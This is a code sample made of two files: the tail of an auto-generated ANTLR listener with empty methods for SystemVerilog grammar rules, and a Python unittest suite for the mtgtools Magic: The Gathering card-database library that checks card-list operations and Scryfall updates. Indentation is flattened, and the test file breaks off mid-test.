# Exit a parse tree produced by SystemVerilogParser#cross_body.
def exitCross_body(self, ctx:SystemVerilogParser.Cross_bodyContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cross_body_item.
def enterCross_body_item(self, ctx:SystemVerilogParser.Cross_body_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cross_body_item.
def exitCross_body_item(self, ctx:SystemVerilogParser.Cross_body_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bins_selection_or_option.
def enterBins_selection_or_option(self, ctx:SystemVerilogParser.Bins_selection_or_optionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bins_selection_or_option.
def exitBins_selection_or_option(self, ctx:SystemVerilogParser.Bins_selection_or_optionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bins_selection.
def enterBins_selection(self, ctx:SystemVerilogParser.Bins_selectionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bins_selection.
def exitBins_selection(self, ctx:SystemVerilogParser.Bins_selectionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#select_expression.
def enterSelect_expression(self, ctx:SystemVerilogParser.Select_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#select_expression.
def exitSelect_expression(self, ctx:SystemVerilogParser.Select_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#select_condition.
def enterSelect_condition(self, ctx:SystemVerilogParser.Select_conditionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#select_condition.
def exitSelect_condition(self, ctx:SystemVerilogParser.Select_conditionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bins_expression.
def enterBins_expression(self, ctx:SystemVerilogParser.Bins_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bins_expression.
def exitBins_expression(self, ctx:SystemVerilogParser.Bins_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_range_list.
def enterCovergroup_range_list(self, ctx:SystemVerilogParser.Covergroup_range_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_range_list.
def exitCovergroup_range_list(self, ctx:SystemVerilogParser.Covergroup_range_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_value_range.
def enterCovergroup_value_range(self, ctx:SystemVerilogParser.Covergroup_value_rangeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_value_range.
def exitCovergroup_value_range(self, ctx:SystemVerilogParser.Covergroup_value_rangeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#with_covergroup_expression.
def enterWith_covergroup_expression(self, ctx:SystemVerilogParser.With_covergroup_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#with_covergroup_expression.
def exitWith_covergroup_expression(self, ctx:SystemVerilogParser.With_covergroup_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#set_covergroup_expression.
def enterSet_covergroup_expression(self, ctx:SystemVerilogParser.Set_covergroup_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#set_covergroup_expression.
def exitSet_covergroup_expression(self, ctx:SystemVerilogParser.Set_covergroup_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#integer_covergroup_expression.
def enterInteger_covergroup_expression(self, ctx:SystemVerilogParser.Integer_covergroup_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#integer_covergroup_expression.
def exitInteger_covergroup_expression(self, ctx:SystemVerilogParser.Integer_covergroup_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cross_set_expression.
def enterCross_set_expression(self, ctx:SystemVerilogParser.Cross_set_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cross_set_expression.
def exitCross_set_expression(self, ctx:SystemVerilogParser.Cross_set_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#covergroup_expression.
def enterCovergroup_expression(self, ctx:SystemVerilogParser.Covergroup_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#covergroup_expression.
def exitCovergroup_expression(self, ctx:SystemVerilogParser.Covergroup_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#let_declaration.
def enterLet_declaration(self, ctx:SystemVerilogParser.Let_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#let_declaration.
def exitLet_declaration(self, ctx:SystemVerilogParser.Let_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#let_identifier.
def enterLet_identifier(self, ctx:SystemVerilogParser.Let_identifierContext):
pass
# Exit a parse tree produced by SystemVerilogParser#let_identifier.
def exitLet_identifier(self, ctx:SystemVerilogParser.Let_identifierContext):
pass
# Enter a parse tree produced by SystemVerilogParser#let_port_list.
def enterLet_port_list(self, ctx:SystemVerilogParser.Let_port_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#let_port_list.
def exitLet_port_list(self, ctx:SystemVerilogParser.Let_port_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#let_port_item.
def enterLet_port_item(self, ctx:SystemVerilogParser.Let_port_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#let_port_item.
def exitLet_port_item(self, ctx:SystemVerilogParser.Let_port_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#let_formal_type.
def enterLet_formal_type(self, ctx:SystemVerilogParser.Let_formal_typeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#let_formal_type.
def exitLet_formal_type(self, ctx:SystemVerilogParser.Let_formal_typeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#let_expression.
def enterLet_expression(self, ctx:SystemVerilogParser.Let_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#let_expression.
def exitLet_expression(self, ctx:SystemVerilogParser.Let_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#let_list_of_arguments.
def enterLet_list_of_arguments(self, ctx:SystemVerilogParser.Let_list_of_argumentsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#let_list_of_arguments.
def exitLet_list_of_arguments(self, ctx:SystemVerilogParser.Let_list_of_argumentsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#let_actual_arg.
def enterLet_actual_arg(self, ctx:SystemVerilogParser.Let_actual_argContext):
pass
# Exit a parse tree produced by SystemVerilogParser#let_actual_arg.
def exitLet_actual_arg(self, ctx:SystemVerilogParser.Let_actual_argContext):
pass
# Enter a parse tree produced by SystemVerilogParser#gate_instantiation.
def enterGate_instantiation(self, ctx:SystemVerilogParser.Gate_instantiationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#gate_instantiation.
def exitGate_instantiation(self, ctx:SystemVerilogParser.Gate_instantiationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cmos_switch_instance.
def enterCmos_switch_instance(self, ctx:SystemVerilogParser.Cmos_switch_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cmos_switch_instance.
def exitCmos_switch_instance(self, ctx:SystemVerilogParser.Cmos_switch_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#enable_gate_instance.
def enterEnable_gate_instance(self, ctx:SystemVerilogParser.Enable_gate_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#enable_gate_instance.
def exitEnable_gate_instance(self, ctx:SystemVerilogParser.Enable_gate_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#mos_switch_instance.
def enterMos_switch_instance(self, ctx:SystemVerilogParser.Mos_switch_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#mos_switch_instance.
def exitMos_switch_instance(self, ctx:SystemVerilogParser.Mos_switch_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#n_input_gate_instance.
def enterN_input_gate_instance(self, ctx:SystemVerilogParser.N_input_gate_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#n_input_gate_instance.
def exitN_input_gate_instance(self, ctx:SystemVerilogParser.N_input_gate_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#n_output_gate_instance.
def enterN_output_gate_instance(self, ctx:SystemVerilogParser.N_output_gate_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#n_output_gate_instance.
def exitN_output_gate_instance(self, ctx:SystemVerilogParser.N_output_gate_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pass_switch_instance.
def enterPass_switch_instance(self, ctx:SystemVerilogParser.Pass_switch_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pass_switch_instance.
def exitPass_switch_instance(self, ctx:SystemVerilogParser.Pass_switch_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pass_enable_switch_instance.
def enterPass_enable_switch_instance(self, ctx:SystemVerilogParser.Pass_enable_switch_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pass_enable_switch_instance.
def exitPass_enable_switch_instance(self, ctx:SystemVerilogParser.Pass_enable_switch_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pull_gate_instance.
def enterPull_gate_instance(self, ctx:SystemVerilogParser.Pull_gate_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pull_gate_instance.
def exitPull_gate_instance(self, ctx:SystemVerilogParser.Pull_gate_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pulldown_strength.
def enterPulldown_strength(self, ctx:SystemVerilogParser.Pulldown_strengthContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pulldown_strength.
def exitPulldown_strength(self, ctx:SystemVerilogParser.Pulldown_strengthContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pullup_strength.
def enterPullup_strength(self, ctx:SystemVerilogParser.Pullup_strengthContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pullup_strength.
def exitPullup_strength(self, ctx:SystemVerilogParser.Pullup_strengthContext):
pass
# Enter a parse tree produced by SystemVerilogParser#enable_terminal.
def enterEnable_terminal(self, ctx:SystemVerilogParser.Enable_terminalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#enable_terminal.
def exitEnable_terminal(self, ctx:SystemVerilogParser.Enable_terminalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inout_terminal.
def enterInout_terminal(self, ctx:SystemVerilogParser.Inout_terminalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inout_terminal.
def exitInout_terminal(self, ctx:SystemVerilogParser.Inout_terminalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#input_terminal.
def enterInput_terminal(self, ctx:SystemVerilogParser.Input_terminalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#input_terminal.
def exitInput_terminal(self, ctx:SystemVerilogParser.Input_terminalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ncontrol_terminal.
def enterNcontrol_terminal(self, ctx:SystemVerilogParser.Ncontrol_terminalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ncontrol_terminal.
def exitNcontrol_terminal(self, ctx:SystemVerilogParser.Ncontrol_terminalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#output_terminal.
def enterOutput_terminal(self, ctx:SystemVerilogParser.Output_terminalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#output_terminal.
def exitOutput_terminal(self, ctx:SystemVerilogParser.Output_terminalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pcontrol_terminal.
def enterPcontrol_terminal(self, ctx:SystemVerilogParser.Pcontrol_terminalContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pcontrol_terminal.
def exitPcontrol_terminal(self, ctx:SystemVerilogParser.Pcontrol_terminalContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cmos_switchtype.
def enterCmos_switchtype(self, ctx:SystemVerilogParser.Cmos_switchtypeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cmos_switchtype.
def exitCmos_switchtype(self, ctx:SystemVerilogParser.Cmos_switchtypeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#enable_gatetype.
def enterEnable_gatetype(self, ctx:SystemVerilogParser.Enable_gatetypeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#enable_gatetype.
def exitEnable_gatetype(self, ctx:SystemVerilogParser.Enable_gatetypeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#mos_switchtype.
def enterMos_switchtype(self, ctx:SystemVerilogParser.Mos_switchtypeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#mos_switchtype.
def exitMos_switchtype(self, ctx:SystemVerilogParser.Mos_switchtypeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#n_input_gatetype.
def enterN_input_gatetype(self, ctx:SystemVerilogParser.N_input_gatetypeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#n_input_gatetype.
def exitN_input_gatetype(self, ctx:SystemVerilogParser.N_input_gatetypeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#n_output_gatetype.
def enterN_output_gatetype(self, ctx:SystemVerilogParser.N_output_gatetypeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#n_output_gatetype.
def exitN_output_gatetype(self, ctx:SystemVerilogParser.N_output_gatetypeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pass_en_switchtype.
def enterPass_en_switchtype(self, ctx:SystemVerilogParser.Pass_en_switchtypeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pass_en_switchtype.
def exitPass_en_switchtype(self, ctx:SystemVerilogParser.Pass_en_switchtypeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#pass_switchtype.
def enterPass_switchtype(self, ctx:SystemVerilogParser.Pass_switchtypeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#pass_switchtype.
def exitPass_switchtype(self, ctx:SystemVerilogParser.Pass_switchtypeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_instantiation.
def enterModule_instantiation(self, ctx:SystemVerilogParser.Module_instantiationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_instantiation.
def exitModule_instantiation(self, ctx:SystemVerilogParser.Module_instantiationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_value_assignment.
def enterParameter_value_assignment(self, ctx:SystemVerilogParser.Parameter_value_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_value_assignment.
def exitParameter_value_assignment(self, ctx:SystemVerilogParser.Parameter_value_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_parameter_assignments.
def enterList_of_parameter_assignments(self, ctx:SystemVerilogParser.List_of_parameter_assignmentsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_parameter_assignments.
def exitList_of_parameter_assignments(self, ctx:SystemVerilogParser.List_of_parameter_assignmentsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ordered_parameter_assignment.
def enterOrdered_parameter_assignment(self, ctx:SystemVerilogParser.Ordered_parameter_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ordered_parameter_assignment.
def exitOrdered_parameter_assignment(self, ctx:SystemVerilogParser.Ordered_parameter_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#named_parameter_assignment.
def enterNamed_parameter_assignment(self, ctx:SystemVerilogParser.Named_parameter_assignmentContext):
pass
# Exit a parse tree produced by SystemVerilogParser#named_parameter_assignment.
def exitNamed_parameter_assignment(self, ctx:SystemVerilogParser.Named_parameter_assignmentContext):
pass
# Enter a parse tree produced by SystemVerilogParser#hierarchical_instance.
| |
<gh_stars>10-100
import unittest
import warnings
from mtgtools import MtgDB
from mtgtools.PCardList import PCardList
from mtgtools.PSetList import PSetList
tool = MtgDB.MtgDB("testdb.fs")
tool.scryfall_update()
cards = tool.root.scryfall_cards
sets = tool.root.scryfall_sets
basic_lands = 3 * cards.where_exactly(name='forest')[0:1] + \
3 * cards.where_exactly(name='mountain')[0:1] + \
3 * cards.where_exactly(name='island')[0:1] + \
3 * cards.where_exactly(name='swamp')[0:1] + \
3 * cards.where_exactly(name='plains')[0:1]
non_basic_lands = 3 * cards.where_exactly(name='bayou')[0:1] + \
3 * cards.where_exactly(name='Cascading Cataracts')[0:1] + \
3 * cards.where_exactly(name='Evolving Wilds')[0:1] + \
3 * cards.where_exactly(name='Mutavault')[0:1]
creatures = 3 * cards.where_exactly(name='wild mongrel')[0:1] + \
3 * cards.where_exactly(name='Ogre Taskmaster')[0:1] + \
3 * cards.where_exactly(name='Aquamoeba')[0:1] + \
3 * cards.where_exactly(name='Midnight Banshee')[0:1] + \
3 * cards.where_exactly(name='Trapjaw Tyrant')[0:1] + \
3 * cards.where_exactly(name='Merfolk Mistbinder')[0:1] + \
3 * cards.where_exactly(name='Storm Fleet Sprinter')[0:1] + \
3 * cards.where_exactly(name='Jungle Creeper')[0:1] + \
3 * cards.where_exactly(name='Belligerent Hatchling')[0:1] + \
3 * cards.where_exactly(name='Crackleburr')[0:1] + \
3 * cards.where_exactly(name='Akki Lavarunner // Tok-Tok, Volcano Born')[0:1] + \
3 * cards.where_exactly(name="Homura, Human Ascendant // Homura's Essence")[0:1] + \
3 * cards.where_exactly(name='Accursed Witch // Infectious Curse')[0:1] + \
3 * cards.where_exactly(name='Civilized Scholar // Homicidal Brute')[0:1] +\
3 * cards.where_exactly(name='Dryad Arbor')[0:1] + \
3 * cards.where_exactly(name='Aegis of the Gods')[0:1]
non_creature_spells = 3 * cards.where_exactly(name='Back from the Brink')[0:1] + \
3 * cards.where_exactly(name='Blazing Torch')[0:1] + \
3 * cards.where_exactly(name='Fall of the Thran')[0:1] + \
3 * cards.where_exactly(name='Bonds of Faith')[0:1] + \
3 * cards.where_exactly(name='Brimstone Volley')[0:1] + \
3 * cards.where_exactly(name='Bump in the Night')[0:1] + \
3 * cards.where_exactly(name='Cellar Door')[0:1] + \
3 * cards.where_exactly(name='Curse of the Bloody Tome')[0:1] + \
3 * cards.where_exactly(name="Full Moon's Rise")[0:1] + \
3 * cards.where_exactly(name='Alive // Well')[0:1] + \
3 * cards.where_exactly(name='Appeal // Authority')[0:1] + \
3 * cards.where_exactly(name='Izzet Signet')[0:1]
planeswalkers = 3 * cards.where_exactly(name='Liliana of the Veil')[0:1] + \
3 * cards.where_exactly(name='Garruk Relentless // Garruk, the Veil-Cursed')[0:1] + \
3 * cards.where_exactly(name='<NAME>')[0:1]
tokens = 3 * cards.where_exactly(name='Angel')[0:1] + \
3 * cards.where_exactly(name='Clue')[0:1] + \
3 * cards.where_exactly(name='Energy Reserve')[0:1] + \
3 * cards.where_exactly(name='Angel // Demon')[0:1]
other = 3 * cards.where_exactly(name='<NAME>')[0:1] + \
3 * cards.where_exactly(name='Ashnod')[0:1] + \
3 * cards.where_exactly(name='Agyrem')[0:1] + \
3 * cards.where_exactly(name='All in Good Time')[0:1]
testlist = other + tokens + creatures + non_basic_lands + \
non_creature_spells + basic_lands + planeswalkers
class TestPCardsListMethodsScryfall(unittest.TestCase):
def test_integrity(self):
tool.verify_scryfall_integrity()
def test_basic_update(self):
clean_db = MtgDB.MtgDB("clean_db.fs")
clean_db.scryfall_update()
clean_db.verify_scryfall_integrity()
clean_db.close()
def test_update_changed_sets(self):
clean_db = MtgDB.MtgDB("clean_db.fs")
c_set = clean_db.root.scryfall_sets[0]
c_cards = PCardList(c_set._cards)
c1_l = len(clean_db.root.scryfall_cards)
s1_l = len(clean_db.root.scryfall_sets)
c_set_code = c_set.code
c_set_name = c_set.name
c_set.code= 'xxxyyyy'
c_set.name = 'xxxyyyy'
self.assertTrue(c_set_code not in [pset.code for pset in clean_db.root.scryfall_sets])
self.assertTrue(c_set_name not in [pset.name for pset in clean_db.root.scryfall_sets])
self.assertTrue('xxxyyyy' in [pset.code for pset in clean_db.root.scryfall_sets])
self.assertTrue('xxxyyyy' in [pset.name for pset in clean_db.root.scryfall_sets])
clean_db.commit()
clean_db.scryfall_update()
self.assertTrue('xxxyyyy' not in [pset.code for pset in clean_db.root.scryfall_sets])
self.assertTrue('xxxyyyy' not in [pset.name for pset in clean_db.root.scryfall_sets])
self.assertTrue(c_set_code in [pset.code for pset in clean_db.root.scryfall_sets])
self.assertTrue(c_set_name in [pset.name for pset in clean_db.root.scryfall_sets])
self.assertEqual(c1_l, len(clean_db.root.scryfall_cards))
self.assertEqual(s1_l, len(clean_db.root.scryfall_sets))
self.assertTrue(clean_db.root.scryfall_sets.where_exactly(code=c_set_code)[0].has_all(c_cards))
self.assertEqual(len(clean_db.root.scryfall_sets.where_exactly(code=c_set_code)[0]), len(c_cards))
self.assertEqual(len(clean_db.root.scryfall_cards),
sum([len(pset.cards) for pset in clean_db.root.scryfall_sets]))
for pset in clean_db.root.scryfall_sets:
self.assertEqual(len(pset.cards), pset.card_count)
for card in pset.cards:
self.assertEqual(card.set, pset.code)
clean_db.verify_scryfall_integrity()
clean_db.close()
def test_update_changed_cards(self):
clean_db = MtgDB.MtgDB("clean_db.fs")
c1_l = len(clean_db.root.scryfall_cards)
s1_l = len(clean_db.root.scryfall_sets)
c1 = clean_db.root.scryfall_cards[10000]
old_name = c1.name
old_code = c1.set
c1.name = "xxxyyyy"
c1.set = "xxxyyyy"
clean_db.commit()
clean_db.scryfall_update()
self.assertEqual(c1_l, len(clean_db.root.scryfall_cards))
self.assertEqual(s1_l, len(clean_db.root.scryfall_sets))
self.assertNotEqual(c1.name, "xxxyyyy")
self.assertNotEqual(c1.set, "xxxyyyy")
self.assertEqual(c1.name, old_name)
self.assertEqual(c1.set, old_code)
self.assertEqual(len(clean_db.root.scryfall_cards),
sum([len(pset.cards) for pset in clean_db.root.scryfall_sets]))
for pset in clean_db.root.scryfall_sets:
self.assertEqual(len(pset.cards), pset.card_count)
for card in pset.cards:
self.assertEqual(card.set, pset.code)
clean_db.verify_scryfall_integrity()
clean_db.close()
def test_basic(self):
self.assertEqual(len(tokens + other), 24)
self.assertEqual(len(planeswalkers + other), 21)
self.assertEqual(len(basic_lands + non_basic_lands), 27)
self.assertEqual(len(testlist), 144)
self.assertEqual(len(basic_lands), 15)
self.assertEqual(len(non_basic_lands), 12)
self.assertEqual(len(creatures), 48)
self.assertEqual(len(non_creature_spells), 36)
self.assertEqual(len(planeswalkers), 9)
self.assertEqual(len(tokens), 12)
self.assertEqual(len(other), 12)
self.assertEqual(len(testlist.basic_lands()), 15)
self.assertEqual(len(testlist.creatures()), 54)
self.assertEqual(len(testlist.lands()), 30)
self.assertEqual(len(testlist.noncreatures()), 90)
self.assertEqual(len(testlist.unique_cards()), 48)
self.assertEqual(len(testlist.unique_names()), 48)
self.assertEqual(len(testlist.normal_playable_cards()), 120)
self.assertEqual(len(testlist - testlist.lands()), 114)
self.assertEqual(len(testlist - testlist.creatures()), 90)
self.assertEqual(len(testlist + testlist.lands()), 174)
self.assertEqual(len(testlist + testlist.creatures()), 198)
self.assertEqual(len(testlist * 2), 288)
self.assertEqual(len(2 * testlist), 288)
self.assertEqual(len(5 * testlist[0:1]), 5)
self.assertTrue(testlist[0] in 3 * testlist[0:1])
self.assertTrue(testlist.has_all(creatures))
self.assertTrue(testlist.has_any(creatures))
self.assertTrue(testlist.has_all(planeswalkers))
self.assertTrue(testlist.has_any(planeswalkers))
self.assertTrue(testlist.has_all(other))
self.assertTrue(testlist.has_any(other))
self.assertTrue(testlist.has_all(non_creature_spells))
self.assertTrue(testlist.has_any(non_creature_spells))
self.assertTrue(testlist.has_all(non_basic_lands))
self.assertTrue(testlist.has_any(non_basic_lands))
self.assertTrue(testlist.has_all(basic_lands))
self.assertTrue(testlist.has_any(basic_lands))
self.assertTrue(testlist.has_all(creatures + creatures[0]))
self.assertTrue(testlist.has_any(creatures + creatures[0]))
self.assertTrue(testlist.has_all(planeswalkers + creatures[0]))
self.assertTrue(testlist.has_any(planeswalkers + creatures[0]))
self.assertTrue(testlist.has_all(other + creatures[0]))
self.assertTrue(testlist.has_any(other + creatures[0]))
self.assertTrue(testlist.has_all(non_creature_spells + creatures[0]))
self.assertTrue(testlist.has_any(non_creature_spells + creatures[0]))
self.assertTrue(testlist.has_all(non_basic_lands + creatures[0]))
self.assertTrue(testlist.has_any(non_basic_lands + creatures[0]))
self.assertTrue(testlist.has_all(basic_lands + creatures[0]))
self.assertTrue(testlist.has_any(basic_lands + creatures[0]))
self.assertFalse(cards.where_exactly(name='forest')[1] in basic_lands)
self.assertFalse(cards.where_exactly(name='bayou')[1] in non_basic_lands)
self.assertFalse(cards.where_exactly(name='island')[0] in non_basic_lands)
self.assertTrue(cards.where_exactly(name='forest')[0] in basic_lands)
self.assertTrue(cards.where_exactly(name='bayou')[0] in non_basic_lands)
self.assertTrue(cards.where_exactly(name='Dryad Arbor')[0] in creatures)
list1 = PCardList(creatures[0:3])
list2 = PCardList(list1)
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 3)
list1.append(creatures[7])
self.assertEqual(len(list1), 4)
self.assertEqual(len(list2), 3)
list2.append(creatures[7])
self.assertEqual(len(list1), 4)
self.assertEqual(len(list2), 4)
list1 = PCardList([creatures[0], creatures[1], creatures[2]])
list2 = PCardList(list1)
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 3)
list1.append(creatures[7])
self.assertEqual(len(list1), 4)
self.assertEqual(len(list2), 3)
list2.append(creatures[7])
self.assertEqual(len(list1), 4)
self.assertEqual(len(list2), 4)
list1 = PCardList(creatures[0:3])
list2 = PCardList(list1)
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 3)
list1 += creatures[7]
self.assertEqual(len(list1), 4)
self.assertEqual(len(list2), 3)
list2 += creatures[7]
self.assertEqual(len(list1), 4)
self.assertEqual(len(list2), 4)
list1 = PCardList(creatures[0:3])
list2 = PCardList(list1)
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 3)
list1 += list2
self.assertEqual(len(list1), 6)
self.assertEqual(len(list2), 3)
list2 += list1
self.assertEqual(len(list1), 6)
self.assertEqual(len(list2), 9)
list1 = creatures[0:3]
list2 = PCardList(list1)
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 3)
list1 += list2
self.assertEqual(len(list1), 6)
self.assertEqual(len(list2), 3)
list2 += list1
self.assertEqual(len(list1), 6)
self.assertEqual(len(list2), 9)
list1 = [creatures[0], creatures[1], creatures[2]]
list2 = PCardList(list1)
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 3)
self.assertEqual(len(list2 + list1), 6)
self.assertEqual(len(list1 + list2), 6)
self.assertEqual(len(list2 + list1[0]), 4)
self.assertEqual(len(list1[0] + list2), 4)
list2 += list1
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 6)
list2 += list1[0]
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 7)
list1 = PCardList() + creatures[0] + creatures[1] + creatures[2]
list2 = PCardList(list1)
self.assertEqual(len(list1), 3)
self.assertEqual(len(list2), 3)
list1.append(creatures[7])
self.assertEqual(len(list1), 4)
self.assertEqual(len(list2), 3)
list2.append(creatures[7])
self.assertEqual(len(list1), 4)
self.assertEqual(len(list2), 4)
def test_filter_and_sort(self):
self.assertEqual(len(testlist), len(testlist.sorted(lambda card: card.name)))
self.assertEqual(len(testlist), len(testlist.sorted(lambda card: card.cmc)))
self.assertEqual(len(testlist), len(testlist.sorted(lambda card: card.type_line)))
self.assertEqual(len(testlist), len(testlist.sorted(lambda card: card.color_identity)))
self.assertEqual(creatures.where_exactly(name='Dryad Arbor')[0], creatures.sorted(lambda card: card.cmc)[0])
self.assertEqual(creatures.where_exactly(name="Homura, Human Ascendant // Homura's Essence")[0],
creatures.sorted(lambda card: card.cmc)[-1])
self.assertEqual(len(creatures) + 6, len(testlist.filtered(lambda card: 'Creature' in card.type_line)))
self.assertTrue(testlist.filtered(lambda card: 'Creature' in card.type_line).has_all(creatures))
def test_groups(self):
tgst = testlist.grouped_by_simple_type()
tgstcards = tgst['creatures'] + tgst['noncreatures'] + tgst['lands']
self.assertEqual(len(tgstcards), len(testlist))
self.assertTrue(tgstcards.has_all(testlist))
self.assertTrue(tgst['creatures'].has_all(creatures))
self.assertTrue(tgst['noncreatures'].has_all(non_creature_spells + planeswalkers + other))
self.assertTrue(tgst['lands'].has_all(basic_lands + non_basic_lands))
self.assertFalse(tgst['creatures'].has_any(non_creature_spells))
self.assertFalse(tgst['creatures'].has_any(non_basic_lands))
tgcmc = testlist.grouped_by_converted_mana_cost()
tgcmccards = PCardList(list(card for sublist in tgcmc.values() for card in sublist))
self.assertEqual(len(tgcmccards), len(testlist))
self.assertTrue(tgcmccards.has_all(testlist))
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgcmc[0])
self.assertTrue(testlist.where_exactly(name="Ashnod")[0] in tgcmc[0])
self.assertTrue(testlist.where_exactly(name="Clue")[0] in tgcmc[0])
self.assertTrue(testlist.where_exactly(name="Blazing Torch")[0] in tgcmc[1])
self.assertTrue(testlist.where_exactly(name="Wild Mongrel")[0] in tgcmc[2])
self.assertTrue(testlist.where_exactly(name="Appeal // Authority")[0] in tgcmc[3])
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgcmc[4])
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgcmc[5])
tgci = testlist.grouped_by_color_identity()
tgciards = PCardList(list(card for sublist in tgci.values() for card in sublist))
self.assertEqual(len(tgciards), len(testlist))
self.assertTrue(tgciards.has_all(testlist))
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgci[''])
self.assertTrue(testlist.where_exactly(name="Ashnod")[0] in tgci[''])
self.assertTrue(testlist.where_exactly(name="Clue")[0] in tgci[''])
self.assertTrue(testlist.where_exactly(name="Blazing Torch")[0] in tgci[''])
self.assertTrue(testlist.where_exactly(name="Wild Mongrel")[0] in tgci['G'])
self.assertTrue(testlist.where_exactly(name="Appeal // Authority")[0] in tgci['GW'])
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgci['RW'])
self.assertTrue(testlist.where_exactly(name="Angel")[0] in tgci['W'])
self.assertTrue(testlist.where_exactly(name="<NAME>")[0] in tgci['G'])
self.assertTrue(testlist.where_exactly(name="Forest")[0] in tgci['G'])
